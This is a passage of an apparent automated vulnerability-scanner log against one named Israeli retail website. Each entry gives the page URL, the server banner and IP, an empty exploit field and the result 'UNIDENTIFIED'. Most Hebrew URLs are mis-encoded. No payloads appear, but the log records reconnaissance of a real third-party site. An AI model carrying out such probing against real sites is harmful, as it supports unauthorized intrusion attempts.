1513|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-זוגי-×‘×¡×›× ×™×Ÿ ]
1514|_[ + ] Exploit::
1515|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1516|_[ + ] More details:: / - / , ISP:
1517|_[ + ] Found:: UNIDENTIFIED
1518
1519 _[ - ]::--------------------------------------------------------------------------------------------------------------
1520|_[ + ] [ 23 / 100 ]-[04:32:06] [ - ]
1521|_[ + ] Target:: [ http://babylon-woodline.co.il/×—× ×•×ª-×ž×–×¨× ×™×-×חיהוד ]
1522|_[ + ] Exploit::
1523|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1524|_[ + ] More details:: / - / , ISP:
1525|_[ + ] Found:: UNIDENTIFIED
1526
1527 _[ - ]::--------------------------------------------------------------------------------------------------------------
1528|_[ + ] [ 24 / 100 ]-[04:32:08] [ - ]
1529|_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרן-ב×לעד ]
1530|_[ + ] Exploit::
1531|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1532|_[ + ] More details:: / - / , ISP:
1533|_[ + ] Found:: UNIDENTIFIED
1534
1535 _[ - ]::--------------------------------------------------------------------------------------------------------------
1536|_[ + ] [ 25 / 100 ]-[04:32:10] [ - ]
1537|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-ב1000-×‘×—× ×ª×•×Ÿ ]
1538|_[ + ] Exploit::
1539|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1540|_[ + ] More details:: / - / , ISP:
1541|_[ + ] Found:: UNIDENTIFIED
1542
1543 _[ - ]::--------------------------------------------------------------------------------------------------------------
1544|_[ + ] [ 26 / 100 ]-[04:32:13] [ - ]
1545|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-בצפת ]
1546|_[ + ] Exploit::
1547|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1548|_[ + ] More details:: / - / , ISP:
1549|_[ + ] Found:: UNIDENTIFIED
1550
1551 _[ - ]::--------------------------------------------------------------------------------------------------------------
1552|_[ + ] [ 27 / 100 ]-[04:32:15] [ - ]
1553|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-200-ב×לרו××™ ]
1554|_[ + ] Exploit::
1555|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1556|_[ + ] More details:: / - / , ISP:
1557|_[ + ] Found:: UNIDENTIFIED
1558
1559 _[ - ]::--------------------------------------------------------------------------------------------------------------
1560|_[ + ] [ 28 / 100 ]-[04:32:17] [ - ]
1561|_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרן-בבצרה ]
1562|_[ + ] Exploit::
1563|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1564|_[ + ] More details:: / - / , ISP:
1565|_[ + ] Found:: UNIDENTIFIED
1566
1567 _[ - ]::--------------------------------------------------------------------------------------------------------------
1568|_[ + ] [ 29 / 100 ]-[04:32:19] [ - ]
1569|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-×§×˜× ×™×-בעזיר ]
1570|_[ + ] Exploit::
1571|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1572|_[ + ] More details:: / - / , ISP:
1573|_[ + ] Found:: UNIDENTIFIED
1574
1575 _[ - ]::--------------------------------------------------------------------------------------------------------------
1576|_[ + ] [ 30 / 100 ]-[04:32:22] [ - ]
1577|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-זולי×-בג××•×œ×™× ]
1578|_[ + ] Exploit::
1579|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1580|_[ + ] More details:: / - / , ISP:
1581|_[ + ] Found:: UNIDENTIFIED
1582
1583 _[ - ]::--------------------------------------------------------------------------------------------------------------
1584|_[ + ] [ 31 / 100 ]-[04:32:24] [ - ]
1585|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-יוקרתיי×-×‘× ×•×¤×™×ª ]
1586|_[ + ] Exploit::
1587|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1588|_[ + ] More details:: / - / , ISP:
1589|_[ + ] Found:: UNIDENTIFIED
1590
1591 _[ - ]::--------------------------------------------------------------------------------------------------------------
1592|_[ + ] [ 32 / 100 ]-[04:32:26] [ - ]
1593|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-בחיפה ]
1594|_[ + ] Exploit::
1595|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1596|_[ + ] More details:: / - / , ISP:
1597|_[ + ] Found:: UNIDENTIFIED
1598
1599 _[ - ]::--------------------------------------------------------------------------------------------------------------
1600|_[ + ] [ 33 / 100 ]-[04:32:28] [ - ]
1601|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-זוגי-ב××¢×¦× ]
1602|_[ + ] Exploit::
1603|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1604|_[ + ] More details:: / - / , ISP:
1605|_[ + ] Found:: UNIDENTIFIED
1606
1607 _[ - ]::--------------------------------------------------------------------------------------------------------------
1608|_[ + ] [ 34 / 100 ]-[04:32:31] [ - ]
1609|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-פשוטי×-×‘×›× ×¨×ª ]
1610|_[ + ] Exploit::
1611|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1612|_[ + ] More details:: / - / , ISP:
1613|_[ + ] Found:: UNIDENTIFIED
1614
1615 _[ - ]::--------------------------------------------------------------------------------------------------------------
1616|_[ + ] [ 35 / 100 ]-[04:32:34] [ - ]
1617|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-×למות ]
1618|_[ + ] Exploit::
1619|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1620|_[ + ] More details:: / - / , ISP:
1621|_[ + ] Found:: UNIDENTIFIED
1622
1623 _[ - ]::--------------------------------------------------------------------------------------------------------------
1624|_[ + ] [ 36 / 100 ]-[04:32:36] [ - ]
1625|_[ + ] Target:: [ http://babylon-woodline.co.il/מזרון-בזול-כרמיה ]
1626|_[ + ] Exploit::
1627|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1628|_[ + ] More details:: / - / , ISP:
1629|_[ + ] Found:: UNIDENTIFIED
1630
1631 _[ - ]::--------------------------------------------------------------------------------------------------------------
1632|_[ + ] [ 37 / 100 ]-[04:32:39] [ - ]
1633|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-×‘×’×Ÿ× ×¨ ]
1634|_[ + ] Exploit::
1635|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1636|_[ + ] More details:: / - / , ISP:
1637|_[ + ] Found:: UNIDENTIFIED
1638
1639 _[ - ]::--------------------------------------------------------------------------------------------------------------
1640|_[ + ] [ 38 / 100 ]-[04:32:41] [ - ]
1641|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-ומיטות-במזרעה ]
1642|_[ + ] Exploit::
1643|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1644|_[ + ] More details:: / - / , ISP:
1645|_[ + ] Found:: UNIDENTIFIED
1646
1647 _[ - ]::--------------------------------------------------------------------------------------------------------------
1648|_[ + ] [ 39 / 100 ]-[04:32:43] [ - ]
1649|_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרן-ב×חיטוב ]
1650|_[ + ] Exploit::
1651|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1652|_[ + ] More details:: / - / , ISP:
1653|_[ + ] Found:: UNIDENTIFIED
1654
1655 _[ - ]::--------------------------------------------------------------------------------------------------------------
1656|_[ + ] [ 40 / 100 ]-[04:32:46] [ - ]
1657|_[ + ] Target:: [ http://babylon-woodline.co.il/×—× ×•×ª-×ž×–×¨× ×™×-×©×¤×™×™× ]
1658|_[ + ] Exploit::
1659|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1660|_[ + ] More details:: / - / , ISP:
1661|_[ + ] Found:: UNIDENTIFIED
1662
1663 _[ - ]::--------------------------------------------------------------------------------------------------------------
1664|_[ + ] [ 41 / 100 ]-[04:32:49] [ - ]
1665|_[ + ] Target:: [ http://babylon-woodline.co.il/×—× ×•×ª-×ž×–×¨× ×™×-××™×ª× ×™× ]
1666|_[ + ] Exploit::
1667|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1668|_[ + ] More details:: / - / , ISP:
1669|_[ + ] Found:: UNIDENTIFIED
1670
1671 _[ - ]::--------------------------------------------------------------------------------------------------------------
1672|_[ + ] [ 42 / 100 ]-[04:32:51] [ - ]
1673|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-×™×¨×“× ×” ]
1674|_[ + ] Exploit::
1675|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1676|_[ + ] More details:: / - / , ISP:
1677|_[ + ] Found:: UNIDENTIFIED
1678
1679 _[ - ]::--------------------------------------------------------------------------------------------------------------
1680|_[ + ] [ 43 / 100 ]-[04:32:54] [ - ]
1681|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-בזול-רחובות ]
1682|_[ + ] Exploit::
1683|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1684|_[ + ] More details:: / - / , ISP:
1685|_[ + ] Found:: UNIDENTIFIED
1686
1687 _[ - ]::--------------------------------------------------------------------------------------------------------------
1688|_[ + ] [ 44 / 100 ]-[04:32:56] [ - ]
1689|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-×דורה ]
1690|_[ + ] Exploit::
1691|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1692|_[ + ] More details:: / - / , ISP:
1693|_[ + ] Found:: UNIDENTIFIED
1694
1695 _[ - ]::--------------------------------------------------------------------------------------------------------------
1696|_[ + ] [ 45 / 100 ]-[04:32:59] [ - ]
1697|_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרון-במסד ]
1698|_[ + ] Exploit::
1699|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1700|_[ + ] More details:: / - / , ISP:
1701|_[ + ] Found:: UNIDENTIFIED
1702
1703 _[ - ]::--------------------------------------------------------------------------------------------------------------
1704|_[ + ] [ 46 / 100 ]-[04:33:01] [ - ]
1705|_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-×ž×–×¨×•× ×™×-דבוריה ]
1706|_[ + ] Exploit::
1707|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1708|_[ + ] More details:: / - / , ISP:
1709|_[ + ] Found:: UNIDENTIFIED
1710
1711 _[ - ]::--------------------------------------------------------------------------------------------------------------
1712|_[ + ] [ 47 / 100 ]-[04:33:03] [ - ]
1713|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-עודפי×-בחוגלה ]
1714|_[ + ] Exploit::
1715|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1716|_[ + ] More details:: / - / , ISP:
1717|_[ + ] Found:: UNIDENTIFIED
1718
1719 _[ - ]::--------------------------------------------------------------------------------------------------------------
1720|_[ + ] [ 48 / 100 ]-[04:33:05] [ - ]
1721|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-מומלצי×-ב×לומות ]
1722|_[ + ] Exploit::
1723|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1724|_[ + ] More details:: / - / , ISP:
1725|_[ + ] Found:: UNIDENTIFIED
1726
1727 _[ - ]::--------------------------------------------------------------------------------------------------------------
1728|_[ + ] [ 49 / 100 ]-[04:33:08] [ - ]
1729|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-דקי×-בקטמון ]
1730|_[ + ] Exploit::
1731|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1732|_[ + ] More details:: / - / , ISP:
1733|_[ + ] Found:: UNIDENTIFIED
1734
1735 _[ - ]::--------------------------------------------------------------------------------------------------------------
1736|_[ + ] [ 50 / 100 ]-[04:33:10] [ - ]
1737|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-×§×˜× ×™×-ב×והד ]
1738|_[ + ] Exploit::
1739|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1740|_[ + ] More details:: / - / , ISP:
1741|_[ + ] Found:: UNIDENTIFIED
1742
1743 _[ - ]::--------------------------------------------------------------------------------------------------------------
1744|_[ + ] [ 51 / 100 ]-[04:33:12] [ - ]
1745|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-עודפי×-בערד ]
1746|_[ + ] Exploit::
1747|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1748|_[ + ] More details:: / - / , ISP:
1749|_[ + ] Found:: UNIDENTIFIED
1750
1751 _[ - ]::--------------------------------------------------------------------------------------------------------------
1752|_[ + ] [ 52 / 100 ]-[04:33:15] [ - ]
1753|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-יפיע ]
1754|_[ + ] Exploit::
1755|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1756|_[ + ] More details:: / - / , ISP:
1757|_[ + ] Found:: UNIDENTIFIED
1758
1759 _[ - ]::--------------------------------------------------------------------------------------------------------------
1760|_[ + ] [ 53 / 100 ]-[04:33:17] [ - ]
1761|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-פשוטי×-×‘× ×¦×¨×ª ]
1762|_[ + ] Exploit::
1763|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1764|_[ + ] More details:: / - / , ISP:
1765|_[ + ] Found:: UNIDENTIFIED
1766
1767 _[ - ]::--------------------------------------------------------------------------------------------------------------
1768|_[ + ] [ 54 / 100 ]-[04:33:19] [ - ]
1769|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-זוגי-בשלומי ]
1770|_[ + ] Exploit::
1771|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1772|_[ + ] More details:: / - / , ISP:
1773|_[ + ] Found:: UNIDENTIFIED
1774
1775 _[ - ]::--------------------------------------------------------------------------------------------------------------
1776|_[ + ] [ 55 / 100 ]-[04:33:21] [ - ]
1777|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-ב×ביר-יעקב ]
1778|_[ + ] Exploit::
1779|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1780|_[ + ] More details:: / - / , ISP:
1781|_[ + ] Found:: UNIDENTIFIED
1782
1783 _[ - ]::--------------------------------------------------------------------------------------------------------------
1784|_[ + ] [ 56 / 100 ]-[04:33:24] [ - ]
1785|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-× ×•×—×™×-×‘×”×“×¡×™× ]
1786|_[ + ] Exploit::
1787|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1788|_[ + ] More details:: / - / , ISP:
1789|_[ + ] Found:: UNIDENTIFIED
1790
1791 _[ - ]::--------------------------------------------------------------------------------------------------------------
1792|_[ + ] [ 57 / 100 ]-[04:33:26] [ - ]
1793|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-×‘×‘× ×™-עיש ]
1794|_[ + ] Exploit::
1795|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1796|_[ + ] More details:: / - / , ISP:
1797|_[ + ] Found:: UNIDENTIFIED
1798
1799 _[ - ]::--------------------------------------------------------------------------------------------------------------
1800|_[ + ] [ 58 / 100 ]-[04:33:28] [ - ]
1801|_[ + ] Target:: [ http://babylon-woodline.co.il/index.1.html ]
1802|_[ + ] Exploit::
1803|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1804|_[ + ] More details:: / - / , ISP:
1805|_[ + ] Found:: UNIDENTIFIED
1806
1807 _[ - ]::--------------------------------------------------------------------------------------------------------------
1808|_[ + ] [ 59 / 100 ]-[04:33:30] [ - ]
1809|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-בהודיות ]
1810|_[ + ] Exploit::
1811|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1812|_[ + ] More details:: / - / , ISP:
1813|_[ + ] Found:: UNIDENTIFIED
1814
1815 _[ - ]::--------------------------------------------------------------------------------------------------------------
1816|_[ + ] [ 60 / 100 ]-[04:33:33] [ - ]
1817|_[ + ] Target:: [ http://babylon-woodline.co.il/מזרון-בזול-ריחן ]
1818|_[ + ] Exploit::
1819|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1820|_[ + ] More details:: / - / , ISP:
1821|_[ + ] Found:: UNIDENTIFIED
1822
1823 _[ - ]::--------------------------------------------------------------------------------------------------------------
1824|_[ + ] [ 61 / 100 ]-[04:33:35] [ - ]
1825|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨× ×™×-זולי×-קדימה ]
1826|_[ + ] Exploit::
1827|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1828|_[ + ] More details:: / - / , ISP:
1829|_[ + ] Found:: UNIDENTIFIED
1830
1831 _[ - ]::--------------------------------------------------------------------------------------------------------------
1832|_[ + ] [ 62 / 100 ]-[04:33:37] [ - ]
1833|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-זוגי-×‘×‘×•×¨×’×ª× ]
1834|_[ + ] Exploit::
1835|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1836|_[ + ] More details:: / - / , ISP:
1837|_[ + ] Found:: UNIDENTIFIED
1838
1839 _[ - ]::--------------------------------------------------------------------------------------------------------------
1840|_[ + ] [ 63 / 100 ]-[04:33:40] [ - ]
1841|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-×™×¨×•×©×œ×™× ]
1842|_[ + ] Exploit::
1843|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1844|_[ + ] More details:: / - / , ISP:
1845|_[ + ] Found:: UNIDENTIFIED
1846
1847 _[ - ]::--------------------------------------------------------------------------------------------------------------
1848|_[ + ] [ 64 / 100 ]-[04:33:42] [ - ]
1849|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-ריחן ]
1850|_[ + ] Exploit::
1851|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1852|_[ + ] More details:: / - / , ISP:
1853|_[ + ] Found:: UNIDENTIFIED
1854
1855 _[ - ]::--------------------------------------------------------------------------------------------------------------
1856|_[ + ] [ 65 / 100 ]-[04:33:44] [ - ]
1857|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-160-בביריה ]
1858|_[ + ] Exploit::
1859|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1860|_[ + ] More details:: / - / , ISP:
1861|_[ + ] Found:: UNIDENTIFIED
1862
1863 _[ - ]::--------------------------------------------------------------------------------------------------------------
1864|_[ + ] [ 66 / 100 ]-[04:33:46] [ - ]
1865|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-ברטעה ]
1866|_[ + ] Exploit::
1867|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1868|_[ + ] More details:: / - / , ISP:
1869|_[ + ] Found:: UNIDENTIFIED
1870
1871 _[ - ]::--------------------------------------------------------------------------------------------------------------
1872|_[ + ] [ 67 / 100 ]-[04:33:49] [ - ]
1873|_[ + ] Target:: [ http://babylon-woodline.co.il/×—× ×•×ª-×ž×–×¨× ×™×-במג×ר ]
1874|_[ + ] Exploit::
1875|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1876|_[ + ] More details:: / - / , ISP:
1877|_[ + ] Found:: UNIDENTIFIED
1878
1879 _[ - ]::--------------------------------------------------------------------------------------------------------------
1880|_[ + ] [ 68 / 100 ]-[04:33:51] [ - ]
1881|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-טבעיי×-בפצ×ל ]
1882|_[ + ] Exploit::
1883|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1884|_[ + ] More details:: / - / , ISP:
1885|_[ + ] Found:: UNIDENTIFIED
1886
1887 _[ - ]::--------------------------------------------------------------------------------------------------------------
1888|_[ + ] [ 69 / 100 ]-[04:33:53] [ - ]
1889|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-עודפי×-×‘×—×•×¨×©×™× ]
1890|_[ + ] Exploit::
1891|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1892|_[ + ] More details:: / - / , ISP:
1893|_[ + ] Found:: UNIDENTIFIED
1894
1895 _[ - ]::--------------------------------------------------------------------------------------------------------------
1896|_[ + ] [ 70 / 100 ]-[04:33:55] [ - ]
1897|_[ + ] Target:: [ http://babylon-woodline.co.il/×—× ×•×ª-×ž×–×¨× ×™×-×ž×—× ×™×™× ]
1898|_[ + ] Exploit::
1899|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1900|_[ + ] More details:: / - / , ISP:
1901|_[ + ] Found:: UNIDENTIFIED
1902
1903 _[ - ]::--------------------------------------------------------------------------------------------------------------
1904|_[ + ] [ 71 / 100 ]-[04:33:57] [ - ]
1905|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-× ×•×—×™×-×‘×™×›×™× ×™ ]
1906|_[ + ] Exploit::
1907|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1908|_[ + ] More details:: / - / , ISP:
1909|_[ + ] Found:: UNIDENTIFIED
1910
1911 _[ - ]::--------------------------------------------------------------------------------------------------------------
1912|_[ + ] [ 72 / 100 ]-[04:34:00] [ - ]
1913|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-קשי×-ב××•×“× ]
1914|_[ + ] Exploit::
1915|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1916|_[ + ] More details:: / - / , ISP:
1917|_[ + ] Found:: UNIDENTIFIED
1918
1919 _[ - ]::--------------------------------------------------------------------------------------------------------------
1920|_[ + ] [ 73 / 100 ]-[04:34:02] [ - ]
1921|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-סלמה ]
1922|_[ + ] Exploit::
1923|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1924|_[ + ] More details:: / - / , ISP:
1925|_[ + ] Found:: UNIDENTIFIED
1926
1927 _[ - ]::--------------------------------------------------------------------------------------------------------------
1928|_[ + ] [ 74 / 100 ]-[04:34:05] [ - ]
1929|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-צורית ]
1930|_[ + ] Exploit::
1931|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1932|_[ + ] More details:: / - / , ISP:
1933|_[ + ] Found:: UNIDENTIFIED
1934
1935 _[ - ]::--------------------------------------------------------------------------------------------------------------
1936|_[ + ] [ 75 / 100 ]-[04:34:07] [ - ]
1937|_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-מזרון-×ž×‘×§×™×¢×™× ]
1938|_[ + ] Exploit::
1939|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1940|_[ + ] More details:: / - / , ISP:
1941|_[ + ] Found:: UNIDENTIFIED
1942
1943 _[ - ]::--------------------------------------------------------------------------------------------------------------
1944|_[ + ] [ 76 / 100 ]-[04:34:09] [ - ]
1945|_[ + ] Target:: [ http://babylon-woodline.co.il/×—× ×•×ª-×ž×–×¨× ×™×-בחלמיש ]
1946|_[ + ] Exploit::
1947|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1948|_[ + ] More details:: / - / , ISP:
1949|_[ + ] Found:: UNIDENTIFIED
1950
1951 _[ - ]::--------------------------------------------------------------------------------------------------------------
1952|_[ + ] [ 77 / 100 ]-[04:34:11] [ - ]
1953|_[ + ] Target:: [ http://babylon-woodline.co.il/×—× ×•×ª-×ž×–×¨× ×™×-ברטעה ]
1954|_[ + ] Exploit::
1955|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1956|_[ + ] More details:: / - / , ISP:
1957|_[ + ] Found:: UNIDENTIFIED
1958
1959 _[ - ]::--------------------------------------------------------------------------------------------------------------
1960|_[ + ] [ 78 / 100 ]-[04:34:14] [ - ]
1961|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-כרכור ]
1962|_[ + ] Exploit::
1963|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1964|_[ + ] More details:: / - / , ISP:
1965|_[ + ] Found:: UNIDENTIFIED
1966
1967 _[ - ]::--------------------------------------------------------------------------------------------------------------
1968|_[ + ] [ 79 / 100 ]-[04:34:16] [ - ]
1969|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-×יתמר ]
1970|_[ + ] Exploit::
1971|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1972|_[ + ] More details:: / - / , ISP:
1973|_[ + ] Found:: UNIDENTIFIED
1974
1975 _[ - ]::--------------------------------------------------------------------------------------------------------------
1976|_[ + ] [ 80 / 100 ]-[04:34:18] [ - ]
1977|_[ + ] Target:: [ http://babylon-woodline.co.il/רכישת-×ž×–×¨×•× ×™×-×‘×™×–×¨×¢× ]
1978|_[ + ] Exploit::
1979|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1980|_[ + ] More details:: / - / , ISP:
1981|_[ + ] Found:: UNIDENTIFIED
1982
1983 _[ - ]::--------------------------------------------------------------------------------------------------------------
1984|_[ + ] [ 81 / 100 ]-[04:34:21] [ - ]
1985|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-דקי×-ב×דורה ]
1986|_[ + ] Exploit::
1987|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1988|_[ + ] More details:: / - / , ISP:
1989|_[ + ] Found:: UNIDENTIFIED
1990
1991 _[ - ]::--------------------------------------------------------------------------------------------------------------
1992|_[ + ] [ 82 / 100 ]-[04:34:23] [ - ]
1993|_[ + ] Target:: [ http://babylon-woodline.co.il/×§× ×™×™×ª-×ž×–×¨×•× ×™×-×חיסמך ]
1994|_[ + ] Exploit::
1995|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
1996|_[ + ] More details:: / - / , ISP:
1997|_[ + ] Found:: UNIDENTIFIED
1998
1999 _[ - ]::--------------------------------------------------------------------------------------------------------------
2000|_[ + ] [ 83 / 100 ]-[04:34:25] [ - ]
2001|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-דקי×-ב××ž×•× ×™× ]
2002|_[ + ] Exploit::
2003|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2004|_[ + ] More details:: / - / , ISP:
2005|_[ + ] Found:: UNIDENTIFIED
2006
2007 _[ - ]::--------------------------------------------------------------------------------------------------------------
2008|_[ + ] [ 84 / 100 ]-[04:34:27] [ - ]
2009|_[ + ] Target:: [ http://babylon-woodline.co.il/×ž×–×¨×•× ×™×-עודפי×-בלימן ]
2010|_[ + ] Exploit::
2011|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: nginx , IP:62.90.134.182:80
2012|_[ + ] More details:: / - / , ISP:
2013|_[ + ] Found:: UNIDENTIFIED
2014
